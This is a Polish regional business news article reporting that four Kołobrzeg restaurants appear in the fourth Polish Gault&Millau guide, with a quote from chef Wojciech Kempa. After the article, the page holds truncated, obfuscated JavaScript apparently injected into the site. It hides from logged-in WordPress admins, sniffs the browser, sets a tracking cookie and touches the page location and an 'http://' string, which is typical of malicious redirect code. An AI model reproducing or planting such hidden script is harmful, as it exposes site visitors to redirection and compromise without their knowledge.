Kołobrzeskie restauracje z czapkami Gault&Millau | Północna Izba Gospodarcza w Koszalinie

Właśnie ukazało się czwarte wydanie Żółtego Przewodnika Gault&Millau Polska, w którym po raz kolejny znalazły się kołobrzeskie restauracje. Prestiżowe wyróżnienie przyznawane przez niezależnych i anonimowych ekspertów to marzenie każdego szefa kuchni.

Gault&Millau to przewodnik dla prawdziwych smakoszy, który po raz pierwszy ukazał się ponad 50 lat temu we Francji i cieszy się ogromnym zainteresowaniem nie tylko wśród restauratorów, ale przede wszystkim miłośników dobrego jedzenia. W tegorocznej polskiej edycji znalazły się aż 4 restauracje z Kołobrzegu, w tym 2 sieci Zdrojowa Hotels. Restauracja Sand{acz} w Sand Hotel***** z szefem Wojciechem Kempą jest wyróżniana od 2015 roku, kiedy to ukazało się pierwsze wydanie przewodnika. Była to jedyna restauracja na Wybrzeżu w pasie od Szczecina po Łebę, która znalazła się w zestawieniu. Drugą restauracją jest Arté w Diune Hotel***** & Resort z konceptem kulinarnym stworzonym przez utalentowanego szefa kuchni Rafała Durkę. Według inspektorów Gault&Millau na uwagę zasługuje również restauracja proVita z Hotelu Wellness Provita****, a wpis i wyróżnienie otrzymała restauracja Horyzont w Hotelu Aquarius*****.

– To prawdziwy zaszczyt i wyróżnienie dla mojego zespołu, który ciężko pracuje przez cały rok, aby zasłużyć na uznanie w oczach niezależnych inspektorów. Cieszę się, że aż tyle restauracji z Kołobrzegu zostało wyróżnionych, bo to oznacza, że dania, które serwujemy są na najwyższym poziomie. Gratuluję moim kolegom z trzech kołobrzeskich hoteli, którzy również znaleźli się w prestiżowym gronie Gault&Millau – mówi Wojciech Kempa, szef kuchni Restauracji Sand{acz}.

Żółty przewodnik Gault&Millau to międzynarodowy, obiektywny i niezależny przewodnik po restauracjach, produktach regionalnych i hotelach. Najlepsze restauracje zostają wyróżnione kucharskimi czapkami, które są symbolem i gwarancją wyśmienitego jedzenia. W tegorocznej polskiej edycji rekomendacje Gault&Millu otrzymało 580 restauracji.

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m